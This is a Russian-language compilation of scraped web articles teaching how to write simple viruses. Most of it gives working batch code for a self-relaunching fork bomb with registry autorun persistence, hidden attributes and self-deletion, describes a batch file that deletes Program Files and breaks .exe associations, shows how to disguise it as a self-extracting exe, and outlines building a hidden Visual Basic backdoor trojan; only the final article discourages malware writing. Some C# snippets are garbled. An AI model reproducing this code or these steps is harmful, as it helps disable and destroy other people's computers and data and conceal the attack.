Как сделать вирусную программу


Как создать, написать компьютерный вирус?

Как создать простой .bat вирус?

Создание самых простых вирусов не требует наличия специальных сред для разработки программ. И особых знаний, кстати, тоже. Создать вирусы довольно просто, если использовать для этого командную строку. Для этого нужно немного знать синтаксис командной строки и уметь создавать .bat-файлы.

Что такое .bat-файл и как его создать?

Если очень поверхностно, то это файлы с расширением .bat. Такие файлы несут в себе команды, которые должны быть выполнены командным интерпретатором Windows. Все те команды, которые можно выполнить в окне командной строки, можно вписать в .bat-файл и запустить. Результат будет одинаковым.

Чтобы создать .bat-вирус, нам нужен обычный текстовый редактор. В идеале подойдет для этих целей Блокнот. Создав и открыв новый текстовый документ, Вам нужно вписать туда тот код(команды), которые он должен выполнить. После этого, Вам нужно с помощью меню Сохранить как сохранить этот файл, задав ему какое-либо имя с расширением .bat и указав тип файла Все файлы.

Создаем простейший вирус

В данной статье мы рассмотрим создание вируса, который после своего запуска будет бесконечно открывать окно командной строки. Бесконечно и очень быстро открывающиеся окна командной строки не дадут пользователю спокойно работать. Закрыть их всех не успеет никто и очень скоро они забьют оперативную память компьютера, что в свою очередь сильно затормозит работу компьютера, вплоть до полного зависания. Выглядеть это будет приблизительно так:

Вдобавок, мы закинем наш вирус в автозагрузку, что обеспечит автоматический запуск вируса вместе с операционной системой.

Код создаваемого вируса

Сколько программистов, столько разных решений можно придумать для каждой задачи. Я приведу один из своих методов решения такой задачи.

[code]md c:\papka echo start c:\papka\virus.bat>c:\papka\virus.bat reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v virus /d c:\papka\virus.bat attrib +r +h +s c:\papka attrib +r +h +s c:\papka\virus.bat start c:\papka\virus.bat

del %0[/code]

А теперь разберем сам код. Первая строчка создает папку с именем papka в корне диска C:/. Такой адрес приведен только для примера. Использование же корня папки C:/ не совсем хороший вариант для вируса. Если Вы хотите обеспечить хорошую выживаемость Вашему вирусу, лучше всего спрятать его подальше. Первую команду можно даже пропустить, если Вы закинете сам вирус в уже созданную директорию.

Вторая строчка создает файл c:\papka\virus.bat и, с помощью команды echo, вписывает в него команду start c:\papka\virus.bat. Тут нужно знать, что после знака > указывается место вывода приведенной команды. Тут Вам нужно познакомится: c:\papka\virus.bat и есть основное тело вируса. Созданный нами .bat-файл с кодом, который мы сейчас разбираем, является всего лишь установщиком нашего основного вируса. Вы можете использовать другое название и другое местоположение для вируса.

Третья строчка закидывает созданный нами во второй строчке тело вируса в автозагрузку. Для этого используется пользовательская ветка реестра, так как к ней у пользователя всегда есть доступ. А вот использовать автозагрузку компьютера не безопасно, так как пользователь может не иметь административного доступа, что вызовет ненужную ошибку.

Четвертая и пятая строка кода изменяют атрибуты вируса и папки, где хранится вирус. Данными командами, а для этого используется команда attrib, мы добавляем атрибуты Только чтение, Скрытый и Системный и для папки, и для вируса. Использование атрибута r(Только чтение) необязательно. А вот атрибуты Скрытый и Системный хорошо защитят созданный нами вирус. Если не верите, то почитайте статью про вирус, который превращает папки на флешке в ярлыки. Он использует именно эту технологию.

6-ая строчка кода запускает наш вирус. Вы можете пропустить этот пункт, если хотите, чтобы первый запуск вируса произошел только после перезагрузки компьютера.

И, наконец-то, последняя, 7-ая строчка удаляет данный .bat-вирус. Это полезно, так как по этому .bat-файлу можно спокойно выйти на созданный нами вирус и удалить его.

Смысл созданного вируса

Смысл вируса, который уместился в эти 7 строк — создать основной вирус, защитить его и обеспечить его постоянную работу. А так же подмести свои следы. А что делает основной вирус? После запуска основного вируса, он выполняет ту команду, которая вписана в нее. А это команда, в свою очередь, запускает наш вирус, который опять-таки снова запускает самого себя. И так до бесконечности.

Как бороться с такими вирусами?

Во-первых, начало борьбы с данным вирусом начнется после того, как он запуститься. Очень скоро вирус заполнит своими копиями оперативную память и Вы даже мышкой шевельнуть не сможете. Поэтому, такой спектакль нужно пресекать сразу. Для этого прекрасно подойдет кнопка Break на клавиатуре. Жмите ее столько, сколько понадобится, чтобы новые копии перестали создаваться. На клавиатурах без кнопки Break, может помочь сочетание клавиш Ctrl+C.

Как удалить такой вирус?

Вы можете найти и удалить вирус через его запись в автозагрузке(подробнее по ссылке). А так же Вы можете выйти на вирус по команде, которая будет высвечиваться в окне командного интерпретатора. Естественно, если Вы сможете добраться до скрытого и системного файла. Вот таким образом происходит создание простого вируса.

Удачи!

about-windows.ru

Как написать вирусы в блокноте? Пример простого вируса

Не думайте, пожалуйста, что знания о том, как пишутся вирусы, нужны только вирусописателям! В целях компьютерной безопасности они не менее важны и простым пользователям. Даже поверхностное понимание того, как написать вирусы в блокноте, поможет защитить компьютер от многих неприятностей.

Пишем вирус в блокноте

Вот так выглядит вирус, набранный в обыкновенном блокноте, который есть в составе любой системы от Microsoft Windows. Но знайте — это сложно назвать вирусом, просто системные команды, они сохраняются в формате .bat. Для изменения расширений, нужно настроить систему:

  • Открываем «Компьютер«
  • Заходим верхнее в меню «Сервис«, если не видно жмем ALT
  • В этом меню заходим в «Сервис» выбираем пункт «Параметры папок«
  • Заходим во вкладку «Вид» и ищем пункт «Скрывать расширения для зарегистрированных типов файлов«
  • Убираем галочку с этого пункта.

С первого взгляда ничего страшного — всего несколько коротких слов-команд. Но на деле, если поместить этот файл в системную папку «system32\drivers\etc» и прописать его в автозагрузку, чтобы он запускался при загрузке системы, то, после перезапуска компьютера, невозможно будет открыть какую-либо программу или выбрать другое действие на рабочем столе. Не рекомендуется повторять эти действия, если нет навыков работы с системным реестром!

Вместо telnetdrive.bat попробуйте вписать безопасные команды для запуска: Calc (калькулятора), Taskmgr (диспетчера задач) или Mspaint (программы рисования)

С чего начать

Пришло время изучить небольшую общую инструкцию по «изготовлению» таких файлов.

  • Первым делом открываем блокнот;
  • Заносим туда команды, т.е. создаём в нём «тело» вируса;
  • Сохраняем свой труд через Файл -> Сохранить как;
  • Теперь осталось изменить расширение файла .txt на .bat и, вместо сохранённого названия, вписать нужное, которое будет использоваться.

Создаём первый файл-вирус

Простой вирус написан и сохранён в файл. Теперь бы неплохо узнать, что же прописали в тело вируса, сохранённого в файле.

Начинаем разбираться по порядку с первой строки:

  1. @Echo off – без этой команды всё, что написано, высвечивалось бы на экране монитора.
  2. Date11.14 – указывает на дату создания.
  3. If exist c:sky.bat goto abc – проверка существования на диске С файла sky.bat и если его нет
  4. Copy %0 c:sky.bat – размножает себя, изменив первоначальное имя файла на sky.bat
  5. Attrib +h c:sky.bat – скрывает созданный файл от посторонних глаз.
  6. Echo c:sky.bat >>autoexec.bat – вирус прописывается в автозагрузку.
  7. :abc – если он есть, выполнение программы перейдёт сюда.

Далее идут небольшие шалости:

  1. md CRECK – создаёт нужную или ненужную папку, смотря какая цель у создателя вируса.
  2. md NEW – такими папками можно заполнить весь жёсткий диск у пользователя.
  3. Label E: LUZER – прописывает название логического диска Е. В данном случае LUZER.
  4. assoc .exe=.mp3 – расширение .exe будет ассоциироваться, как .mp
  5. del c:Program Files /q –всё, что было в папке Program Files удалится.
  6. del *.* /q – из каталога, где находится вирус, удалится всё, кроме папки с самим вирусом.

Повеселились достаточно, подумаем и о законе:

  1. del %0 – вирус наделает дел и удалит сам себя.

Осталось последнее, узнать, как же его прячут. Просто! Переформатируют файл из расширения .bat в .exe при помощи архиватора WinRAR. При создании архива помечают – «Создать архив SFX» и устанавливают отметку «Выполнить после распаковки». Естественно, указывают настоящее имя, под которым создан вирус.

www.burn-soft.ru

Пишем вирус на языке C#

Пишем вирус на языке программирования C#

Как может быть помните, тут уже была статья как создать вирус, благодаря которому перед пользователем появляются многие сотни окон командной строки, что в свою очередь забивает оперативную память. Напомню, что логика того вируса была в бесконечном открывании одного и того же окна. Ну, а если оперативная память заполниться, то компьютер просто напросто зависнет. В данной статье мы попробуем создать такой же по выполняемой работе вирус, но он будет немного отличаться в коде. К тому же, мы выйдем за рамки простых bat-вирусов и напишем вирус и на языке C#. Вдобавок, на этот раз мы сможем запускать не только окна командной строки, а абсолютно любую программу или файл.

Пишем вирус, бесконечно открывающий любой файл

Чтобы заставить программу делать что-то бесконечно, нужен цикл. Причем цикл должен быть бесконечным. К счастью, в командной строке имеется поддержка циклов. Но работать с ними не сильно удобно. Поэтому мы будем использовать безусловный переход. Ниже приведен весь код, который необходим нашему, в данном случае, bat-вирусу.

[code]:x start mspaint

goto:x[/code]

Вот эти три строчки заставят программу MS Paint открываться бесконечно. Естественно, для этого нужно создать Bat-файл с данным содержимым и запустить его. Модифицировать данный код можно только в одном месте — Вы можете задать любую другую программу или файл, который должен бесконечно запускаться. В случае с программами, у которых имеется специальные команды быстрого запуска, достаточно указать команду быстрого запуска этого приложения или инструмента. Ну, а если же Вам нужно запускать «чужеродный» предмет в здоровом организме Windows, необходимо указать полный путь до файла. При этом полный путь необходимо взять в кавычки, если там встречается пробел.

Пишем аналогичный вирус на языке C#

Написание же подобной программы на языке C# одно из самых простых заданий. Нам всего лишь нужно быть знакомым с циклами и с методом

[code]Process.Start()[/code]

, который позволяет запускать либо приложение, либо любой другой файл. Чтобы начать использовать данный метод, Вам нужно подключить следующую директиву:

[code]using System. Diagnostics;[/code]

Ну, а после этого перед Вами сразу несколько способов написания вируса на C#, который будет бесконечно открывать, например, программу Paint. Ниже я приведу несколько реализации этого вируса, по одному на каждый цикл и безусловный переход:

[code]while (true) { Process. Start(«mspaint»);

}[/code]

[code]do { Process. Start(«mspaint»); }

while (true)[/code]

[code]for (int a=0;a>3;a++) { Process. Start(«mspaint»); a-;

}[/code]

[code]if (1>0) { Process. Start(«mspaint»);

}[/code]

[code]metka:Process. Start(«mspaint»); goto metka;[/code]

В общем, методов решения предостаточно. Можете выбрать любой. Можете даже придумать свой. Главное понять то, что писать вирусы на C# это довольно просто, главное не увлекаться этим. Вот такими незамысловатыми программами можно неплохо подшутить над своими друзьями.

about-windows.ru

❶ Как сделать вирус

Вам понадобится

  • Visual Basic, Microsoft Winsock Control, компьютер, удаленный сервер.

Инструкция

Для создания программы-вируса BackDoor для скрытого удалённого администрирования, состоящего из серверной и клиентской части, сформируйте новый проект на Visual Basic в форме традиционного файла с расширением ехе. Подключите проект к Microsoft Winsock Control, используя меню Project вкладку Components. Выберите файл mswinsck.ocx. Свяжите форму и компонент, после чего уберите заголовок, уменьшите размеры, а для visible форм установите False. Далее измените имя компонента на ws. Присвойте LocalPort число, равное номеру порта. Напишите код программы в Form_Load. При отсутствии соединения, закройте связь в ws, откройте порт. Подключите клиента посредством конкретного ConnectionRequest. Повторите попытку несколько раз.

Соберите код для ws_DataArrival. Этот код будет задействован каждый раз, когда станут поступать данные от сервера. Укажите переменную Data, в которой будут скапливаться вся приходящая информация. Скомпилируйте программу. Дайте ей наименование server.exe.

Снова создайте проект и форму, теперь уже для клиентской части. Организуйте в форме два поля IP и Port, кнопки «Подключиться», «Отключиться», «Сообщение», «Закрыть сервер». Далее добавьте Winsock Control и дайте ему наименование ws. В поле Text в первом пункте установите IP адрес компьютера, во втором - значение порта. Допишите код. Установите связь.

Компилируйте программу в client.exe. Протестируйте полученный троян. Запустите последовательно server.exe, client.exe. Подключитесь, уберите сервер из списка задач.

Видео по теме

Обратите внимание

Повторяйте проверку состояния связи в ws все время работы. Иначе при начале прослушки порта удалённый компьютер подключится, но после его отключения порт перестанет управляться.

Полезный совет

Чтобы скрыть троян в списке задач, подключите функцию RegisterSer в объявлениях формы сервера. После этого измените Form_Load.

Источники:

  • Рекомендации специалистов по данному вопросу.
  • вирус удаленный сервер

www.kakprosto.ru

Как создать компьютерный вирус

25.09.2014 Frenk

Если вы заинтересованы в создании компьютерного вируса, трояна, червя, вредоносного кода, я вам предлагаю это переосмыслить.

Создание вируса, который удаляет файлы или вызывает другие проблемы, не решает ничего и может привести к судебному преследованию по закону.

Другими словами, вы можете быть оштрафованы или заключены в тюрьму.

Вместо того чтобы создавать компьютерные вирусы или другие вредоносные программы, рассмотрите изучение язык компьютерного программирования.

Вы узнаете намного больше, станете более квалифицированным и сможете получить работу в компании, которая разрабатывает программы или анализирует «паразитов».

Я только хочу написать вирус, чтобы узнать, как он работает

Вы узнаете намного больше о том, как работают компьютерные программы и вирусы, научившись программированию, чем будете в письменной форме возиться с «вредителями».

Компьютерным вирусом является только программа, разработана, чтобы сделать вредоносные действия на компьютере, такие как удаление файлов или установку своего кода в файлы других пользователей.

Научившись программированию, вы будете не только знать, как эти задачи можно решать, но и узнаете намного больше.

Мне нужно проверить мой сканер вирусов

Вы можете создать тестовый файл вируса, который можно использовать для тестирования антивирусной программы, без необходимости создавать свой собственный вредитель.

Если я создам хороший компьютерный вирус буду известен

Нет, все что вы можете получить это краткую статью в новостях или свое изображение в наручниках или в тюрьме.

После того, как окажетесь в тюрьме, на вас будет заведена запись и никогда не получите работу в любой респектабельный компьютерной компании с невозможностью получить работу в любом государственным органе.

Если бы вы были написали компьютерного паразита, который будет успешным, вы постоянно будете вынуждены оставаться неизвестным, опасаясь преследования по закону.

Кроме того, если вы сомневаетесь в этом, то почти все знают, кто такой Билл Гейтс, что он сделал для компьютеров, но понятия не имеют о Джеффри Парсон.

Если я напищу хороший вирус смогу устроиться в антивирусной компании

Антивирусные компании не хотят быть связаны с создателями вредоносных программ, которыми заражены потенциальные компьютерные клиенты.

Если вы заинтересованы в получении работы в антивирусной компании, вы будете иметь гораздо больше шансов, научившись программированию и находке уязвимостей в программах.

Такие компании, как Google или Яндекс будут платить хорошие деньги любому, кто сообщает об ошибках или уязвимостях в системе безопасности в любом из своих продуктов.

vsesam.org


Смотрите также